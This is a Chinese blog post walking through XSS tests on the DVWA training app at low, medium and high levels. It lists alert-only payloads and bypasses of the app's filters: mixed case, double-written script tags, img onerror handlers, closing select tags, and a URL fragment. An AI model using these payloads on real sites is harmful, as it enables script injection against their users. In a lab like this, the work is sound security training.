对dvwa的低中高等级进行xss漏洞测试

最新推荐文章于 2024-05-11 10:54:13 发布
最新推荐文章于 2024-05-11 10:54:13 发布
阅读量233 收藏
点赞数
文章标签: xss 前端 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/132581364
版权

低级模式:

首先选择low模式

dom xss测试

首先提交一个内容来获取default用来进行xss注入,对default后面的值进行修改来实现注入

<script>alert('this is low')</script>

出现弹窗,证明含有xss注入

xss(Reflected)注入:

在文本框中输入<script>alert('this is low xss(reflected)')</script>

出现弹框表示成功

xss(Stored)注入:

<script>alert('this is low xss(stored)')</script>

出现弹框表示成功

Medium模式xss漏洞测试:

xss(Dow)漏洞:

普通注入:

输入<script>alert('this is Medium xss(reflected)')</script>发现没反应,返回的是该页面

大小写绕过:

<sCriPt>alert('this is Medium xss(reflected)')</scriPt>发现也没反应

标签绕过:

<img src=x:alert(alt) οnerrοr=eval(src) alt=xss>

还是没有显示,那应该是需要闭合标签了

尝试闭合标签
</option></select><img src=1 οnerrοr=alert('thisisMediumxss(dom)')>

出现弹框表示成功

代码分析:

 通过查看php源码,可以看到会对script语句进行过滤这里把我们的script给if没了(如果发现了script则输入结果自动转为English),但是这是小问题,可以像做反射型和存储型一样换个标签构造一下就ok

xss(Reflected)漏洞测试:

普通注入:

<script>alert('this is Medium xss(reflected)')</script>

发现没成功

大小写注入

<scripT>alert('this is Medium xss(reflected)')</sCRipt>

出现弹框成功表示该页面存在大小写注入

双写注入

<scr<script>ipt>alert('XSS')</scr<script>ipt>

出现弹框,成功

html标签绕过:

<img src=1 οnerrοr=alert('方式')>

出现弹框,说明存在标签注入

xss(Stored)漏洞测试:

<script>alert('this is Med xss(Stored)')</script>

该框中有长度限制

没有出现弹框

对name进行注入,发现有长度限制

修改长度限制

<script>alert('this is Med xss(Stored)')</script>

返回正常,失败

大小写注入

<scriPt>alert('this is Med xss(Stored)')</sCript>

也没有出现弹框

对name进行大小写注入

首先也是修改长度限制

<scriPt>alert('this is Med xss(Stored)')</sCript>

出现弹框,成功,证明name存在大小写注入

标签注入

<img src=1 οnerrοr=alert('标签')>

返回为空

对name进行标签注入

先修改长度限制

<img src=1 οnerrοr=alert('标签')>

成功,name存在标签注入

闭合标签注入

出现弹框表示成功

high模式xss测试

xss(Dow)漏洞测试:

普通注入

<script>alert('this is low xss(dom)')</script>

返回english,失败

大小写绕过

<sCript>alert('this is low xss(dom)')</scriPt>

失败

双写注入

<scr<script>ipt>aleralertt('this is low xss(reflected)')</scr<script>ipt>

失败

标签绕过

<img src=1 οnerrοr=alert('this is high xss(dom)')>

失败

标签闭合注入

</option></select><img src=1 οnerrοr=alert('方式')>

失败

特殊符号绕过

通过查看php源码,可以看到这里直接在服务器后端判断,指定default的值必须为select选择菜单中的值,这里就要用到URL中的一个特殊字符#,这个字符后的数据不会发送到服务器端,相当于绕过了后端的过滤,不需要与服务端进行交互,直接在客户端处理数据的阶段执行。

#default=<script>alert('this is low xss(Dow)')</script>

出现弹框表示成功

xss(Reflected)漏洞测试:

普通注入

<script>alert('this is low xss(reflected)')</script>

失败

大小写注入

<scRipt>alert('this is low xss(reflected)')</sCript>

失败

双写注入

<scr<script>ipt>aleralertt('this is low xss(reflected)')</scr<script>ipt>

失败

单标签注入

<img src=1 οnerrοr=alert('公司')>

出现弹框,成功存在单标签注入

​​​​​​​xss(Stored)漏洞测试:

普通注入

name注入,先修改长度限制

<script>alert('this is low xss(Stored)')</script>

失败

message注入

<script>alert('this is low xss(Stored)')</script>

失败

失败

大小写注入

name注入,修改长度限制

<sCript>alert('this is low xss(Stored)')</scriPt>

失败

message大小写注入

<sCript>alert('this is low xss(Stored)')</scriPt>

失败

双写注入

name注入

<scr<script>ipt>aleralertt('this is high xss(stored)')</scr<script>ipt>

失败

message注入

修改长难度限制

<scr<script>ipt>aleralertt('this is high xss(stored)')</scr<script>ipt>

失败

单标签注入

name注入

<img src=1 οnerrοr=alert('和法国')>

出现弹框,成功,name存在单标签注入

message注入

<img src=1 οnerrοr=alert('和法国')>

失败

慕筱蚺
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
通过DVWA学习DOM型XSS
Mi1k7ea
01-02 4022
下了个新版的DVWA看了下,发现新增了好几个Web漏洞类型,就玩一下顺便做下笔记,完善一下之前那篇很水的DOM XSS文章,虽然这个也很水 :) 基本概念 DOM,全称Document Object Model,是一个平台和语言都立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞,其触...
DVWA测试XSS跨站脚本攻击三种类型
WINDY_PACE的博客
05-04 1745
测试XSS三种类型危害最大的存储型如何无声息钓鱼获取到用户信息
Kali渗透测试DVWA系列4——反射型XSS(跨站脚本攻击)
浅浅的博客
05-11 3949
目录 一、XSS 1、XSS简介 2、XSS类型 3、漏洞形成的根源 二、反射型XSS 1、原理示意图​ 2、实验环境 3、实验步骤 安全级别:LOW 重定向 获取cookie 安全级...
网络安全-靶机dvwaXSS注入Low到High详解(含代码分析)
关注网络安全、云原生安全
10-18 8608
本篇文章,针对靶机dvwa(Damn Vulnerable Web Application)XSS(DOM)、XSS(Reflected)、XSS(Stored)的LOW、MIDIUM、HIGH安全级别使用网络安全-js安全知识点与XSS常用payloads提到的XSS注入payloads,使用手工进行XSS注入。并根据网络安全-php安全知识点对LOW、MIDIUM、HIGH、IMPOSSIBLE安全级别的代码进行解释。 目标:弹出窗口/获得cookie XSS(DOM)-LOW 正常 可
DVWA靶场-文件包含漏洞~保姆级教程!!!
最新发布
2301_77360738的博客
05-11 1415
带你手把手感受dvwa靶场File Inclusion文件包含漏洞,超详细,小白可入!!!
dvwa靶场之xss
m0_63314341的博客
02-26 256
dom类型 我们先说一下low级别 low级别没有做任何防御所以我们修改url为 <​http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=Englishscript%3Ealert(/xss/)%3C/script%3Ej 即可
DVWA--存储型XSS(初高)
firecjh的博客
06-09 531
选择“View Source”查看源程序,发现服务器端对message框内容使用了htmlspecialchars() 函数进行转义,对name框使用str_replace()函数进行替换。选择“View Source”查看源程序,对message参数进行html转义外,还对name参数使用preg_replace()函数进行替换,不能使用常用的绕过方法。2)在界面出现弹框,弹框内容为本人姓名拼音。2)在界面出现弹框,弹框内容为本人姓名拼音。3) 刷新页面,查看是否再次出现弹框,比较与反射型XSS的区别。
DVWA靶场XSS反射性和存储型的漏洞测试(low~high
weixin_51585429的博客
11-07 2106
DVWA靶场XSS反射型、存储型漏洞模块low~high等级
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
DVWA-安装-漏洞测试-漏洞修复指南-需要安装 xpmpp或WampServer。
dvwa靶场,里面也有xss靶场
09-24
XSS攻击是指攻击者通过在网页插入恶意脚本,使得当用户访问该页面,脚本在用户的浏览器上执行,从而获取敏感信息或对用户进行欺诈。DVWAXSS靶场通常包含反射型XSS、存储型XSS和DOM型XSS三个部分,每个部分...
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为... DVWA现在已包含在流行的渗透测试Linux发行版,例如Samurai的Web测试框架等。
DVWA漏洞测试平台分析.v1.0.zip
03-12
在《DVWA漏洞测试平台分析.v1.0》,我们将深入探讨这些漏洞的原理、检测方法以及如何进行防护。以下是对每个主要知识点的详细解析: 1. SQL注入:这是最常见的Web应用漏洞之一,攻击者通过构造恶意SQL语句,欺骗...
十三、kali windows DVWA搭建及测试
01-15
DVWA,我们可以设置不同的安全级别来测试防御机制: 1. 防御级别:Low - 允许简单的命令执行。 2. Medium - 添加了基本的防护,但仍然可以被绕过。 3. High - 增加了更多限制,但仍有潜在的漏洞。 4. ...
渗透测试学习1---DVWAXSS
正在学习的路上...
04-26 325
反射型XSS 1.low PHP源码: <?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user $html .= '<pre>Hello ' . $_GET[ 'name'...
xssdvwa平台下的实战
Night May Say
05-19 6264
课堂上要求学生自由组队准备一个安全相关的主题讲解,于是会兴冲冲的找到学霸想抱大腿。最近应大腿的需求,决定要补充ppt一部分内容以掩盖我们打酱油的真面目,大胖这里是学霸的外号的意思是一个酱油的技术点太酱油,两个酱油的技术点拼起来就刁刁的叻! 前一篇酱油技术是 登陆会话劫持 还有一个酱油技术就是本文了。 也是醉了,后来确定的主题竟然是如何帮助同学查看室友空间,更醉的是,这种猥琐的事情要让我来做!
DVWA靶场通关(XSS
m0_56010012的博客
03-22 9093
XSS漏洞 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,缩写:CSS)混淆,所以架构跨站脚本攻击缩写为XSSXSS就是攻击者在web页面插入恶意的Script代码,当用户浏览该页面,嵌入其的js代码会被执行,从而达到恶意攻击的目的。某种意义上也是一种注入攻击,是指攻击者在页面注入恶意的脚本代码,当受害者访问该页面,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚
DVWA实战测试XSS
0xdawn的博客
08-08 962
0x01 XSS(Reflected) Low 源码分析 <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user...
dvwaxss练手实践
热门推荐
h1012946585的博客
09-07 1万+
xss简介: 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页就会受到影响。XSS攻击通常指的是通过利用网页开发留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。从而使目标计算机收到危害。 分类: xss漏洞分为三...
DVWAXSS (完整版)
一期一会的博客
03-30 5266
xss DOM型xss
dvwa利用xss漏洞绕过csrf漏洞
05-20
DVWA,可以使用以下步骤来利用XSS漏洞绕过CSRF漏洞: 1. 打开DVWA,进入CSRF页面。在这个页面上,你将需要创建一个新的帖子。 2. 在新帖子的标题,我们可以插入一段XSS代码,例如:`<script>document.forms...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值